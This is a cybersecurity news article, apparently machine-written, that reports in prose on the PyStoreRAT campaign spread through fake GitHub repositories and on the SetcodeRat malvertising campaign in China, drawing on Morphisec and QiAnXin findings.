Ethical Hacking News
Cybersecurity Threats on the Rise: A New Era of Malware Campaigns and Supply Chain Attacks
A new campaign is using GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT, highlighting the growing sophistication of modern malware campaigns. This threat serves as a reminder that cybersecurity is an ongoing challenge that requires constant vigilance from individuals and organizations alike.
The PyStoreRAT campaign uses GitHub-hosted Python repositories to distribute a JavaScript-based Remote Access Trojan (RAT). Threat actors are using sophisticated tactics and tools, including public platforms like GitHub, to carry out their nefarious plans. The malware was distributed through loader stubs embedded in repositories masquerading as OSINT tools, DeFi bots, and security-themed utilities. The campaign is part of a growing trend in cybersecurity threats that include supply chain attacks, zero-day vulnerabilities, and evolving malware campaigns. The PyStoreRAT campaign has been linked to a threat actor of likely Eastern European origin, according to Morphisec. The malware features modular, script-based implants that can adapt to security controls and deliver multiple payload formats. Another remote access trojan (RAT) codenamed SetcodeRat is being propagated across China via malvertising lures.
The world of cybersecurity has been abuzz with recent reports of various malicious activities, including a new campaign that leverages GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT. This development is part of a growing trend in the cybersecurity landscape, where threat actors are increasingly using sophisticated tactics and tools to carry out their nefarious plans.
In this article, we will delve into the details of the PyStoreRAT campaign and its implications for individuals and organizations alike. We will also explore other recent threats and trends that have emerged in the field of cybersecurity, including supply chain attacks, zero-day vulnerabilities, and the evolving landscape of malware campaigns.
The PyStoreRAT campaign is a striking example of how threat actors are using publicly available platforms like GitHub to spread malware. According to reports, the malware was distributed through Python or JavaScript loader stubs embedded in repositories masquerading as OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities that were designed to appeal to analysts and developers.
The earliest signs of this campaign date back to mid-June 2025, with a steady stream of "repositories" published since then. The tools were promoted via social media platforms like YouTube and X, as well as artificially inflated their star and fork metrics – a technique reminiscent of the Stargazers Ghost Network.
The threat actors behind this campaign leveraged either newly created GitHub accounts or those that lay dormant for months to publish the repositories, stealthily slipping the malicious payload in the form of "maintenance" commits in October and November after the tools began to gain popularity and landed on GitHub's top trending lists.
In fact, many of the tools did not function as they were advertised, only displaying static menus or non-interactive interfaces in some cases, while others performed minimal placeholder operations. The intention behind this operation was to lend them a veneer of legitimacy by abusing GitHub's inherent trust and deceiving users into executing the loader stub that's responsible for initiating the infection chain.
This effectively triggers the execution of a remote HTML Application (HTA) payload that, in turn, delivers the PyStoreRAT malware, which comes with capabilities to profile the system, check for administrator privileges, and scan the system for cryptocurrency wallet-related files. The loader stub gathers a list of installed antivirus products and check strings matching "Falcon" or "Reason," likely in an attempt to reduce visibility.
In the event they are detected, it launches "mshta.exe" by means of "cmd.exe." Otherwise, it proceeds with direct "mshta.exe" execution. Persistence is achieved by setting up a scheduled task that's disguised as an NVIDIA app self-update. In the final stage, the malware contacts an external server to fetch commands to be executed on the host.
Some of the supported commands include downloading and executing EXE payloads, including Rhadamanthys; downloading and extracting ZIP archives; downloading a malicious DLL and executing it using "rundll32.exe"; fetching raw JavaScript code and executing it dynamically in memory using eval(); downloading and installing MSI packages; spawning a secondary "mshta.exe" process to load additional remote HTA payloads; executing PowerShell commands directly in memory; spreading via removable drives by replacing legitimate documents with malicious Windows Shortcut (LNK) files; and deleting the scheduled task to remove the forensic trail.
The presence of Russian-language artifacts and coding patterns alludes to a threat actor of likely Eastern European origin, according to Morphisec. "PyStoreRAT represents a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats," Yonatan Edri said in his report on the malware.
"The use of HTA/JS for execution, Python loaders for delivery, and Falcon-aware evasion logic creates a stealthy first-stage foothold that traditional EDR solutions detect only late in the infection chain." This warning highlights the growing sophistication of modern malware campaigns and the need for organizations to stay vigilant in their security posture.
The disclosure comes as Chinese security vendor QiAnXin detailed another new remote access trojan (RAT) codenamed SetcodeRat that's likely being propagated across the country since October 2025 via malvertising lures. Hundreds of computers, including those belonging to governments and enterprises, are said to have been infected in a span of one month.
"The malicious installation package will first verify the region of the victim," the QiAnXin Threat Intelligence Center said. "If it is not in the Chinese-speaking area, it will automatically exit." The malware is disguised as legitimate installers for popular programs like Google Chrome and proceeds to the next stage only if the system language corresponds to Mainland China (Zh-CN), Hong Kong (Zh-HK), Macao (Zh-MO), and Taiwan (Zh-TW).
In the next stage, an executable named "pnm2png.exe" is launched to sideload "zlib1.dll," which then decrypts the contents of a file called "qt.conf" and runs it. The decrypted payload is a DLL that embeds the RAT payload. SetcodeRat can either connect to Telegram or a conventional command-and-control (C2) server to retrieve instructions and carry out data theft.
It enables the malware to take screenshots, log keystrokes, read folders, set folders, start processes, run "cmd.exe," set socket connections, collect system and network connection information, update itself to a new version. These capabilities highlight the evolving nature of remote access trojans and the importance of staying informed about emerging threats.
The increasing sophistication of malware campaigns serves as a reminder that cybersecurity is an ongoing challenge that requires constant vigilance from individuals and organizations alike. As the threat landscape continues to evolve, it's essential for organizations to stay up-to-date with the latest security measures and trends in order to protect themselves against potential attacks.
In conclusion, the recent emergence of PyStoreRAT highlights a new era of malware campaigns and supply chain attacks that are sophisticated, stealthy, and designed to deceive even the most seasoned cybersecurity professionals. By staying informed about emerging threats and taking proactive steps to strengthen their security posture, organizations can better protect themselves against these types of attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/Cybersecurity-Threats-on-the-Rise-A-New-Era-of-Malware-Campaigns-and-Supply-Chain-Attacks-ehn.shtml
https://thehackernews.com/2025/12/fake-osint-and-gpt-utility-github-repos.html
https://hackread.com/pystorerat-rat-malware-github-osint-researchers/
Published: Fri Dec 12 13:26:40 2025 by llama3.2 3B Q4_K_M
